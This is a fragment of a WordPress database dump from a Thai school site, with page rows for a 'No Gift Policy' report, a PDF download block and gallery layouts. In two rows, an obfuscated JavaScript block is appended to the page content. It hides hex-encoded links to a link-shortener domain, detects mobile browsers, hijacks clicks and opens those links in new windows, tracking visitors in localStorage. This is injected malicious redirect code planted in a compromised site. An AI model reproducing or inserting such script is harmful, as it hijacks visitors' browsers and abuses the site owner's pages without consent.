_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','การสร้างวัฒนธรรม  No Gift Policy','','inherit','closed','closed','','828-revision-v1','','','2024-08-15 09:30:28','2024-08-15 02:30:28','',828,'http://pakhaeng.ssk.in.th/?p=830',0,'revision','',0),
(831,1,'2024-08-15 09:32:13','2024-08-15 02:32:13','<!-- wp:file {\"id\":866,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แบบสรุปรายงานตามนโยบาย-No-Gift-Policy-จากการปฏิบัติหน้าที่.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แบบสรุปรายงานตามนโยบาย-No-Gift-Policy-จากการปฏิบัติหน้าที่.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"แบบสรุปรายงานตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่\"></object><a id=\"wp-block-file--media-ac1714d9-cc46-47ae-926e-c264f6ea5a30\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แบบสรุปรายงานตามนโยบาย-No-Gift-Policy-จากการปฏิบัติหน้าที่.pdf\">แบบสรุปรายงานตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แบบสรุปรายงานตามนโยบาย-No-Gift-Policy-จากการปฏิบัติหน้าที่.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-ac1714d9-cc46-47ae-926e-c264f6ea5a30\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายงานผลตามนโยบาย No Gift Policy','','publish','closed','closed','','%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%95%e0%b8%b2%e0%b8%a1%e0%b8%99%e0%b9%82%e0%b8%a2%e0%b8%9a%e0%b8%b2%e0%b8%a2-no-gift-policy','','','2024-08-15 11:58:10','2024-08-15 04:58:10','',0,'http://pakhaeng.ssk.in.th/?page_id=831',0,'page','',0),
(832,1,'2024-08-15 09:30:49','2024-08-15 02:30:49','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-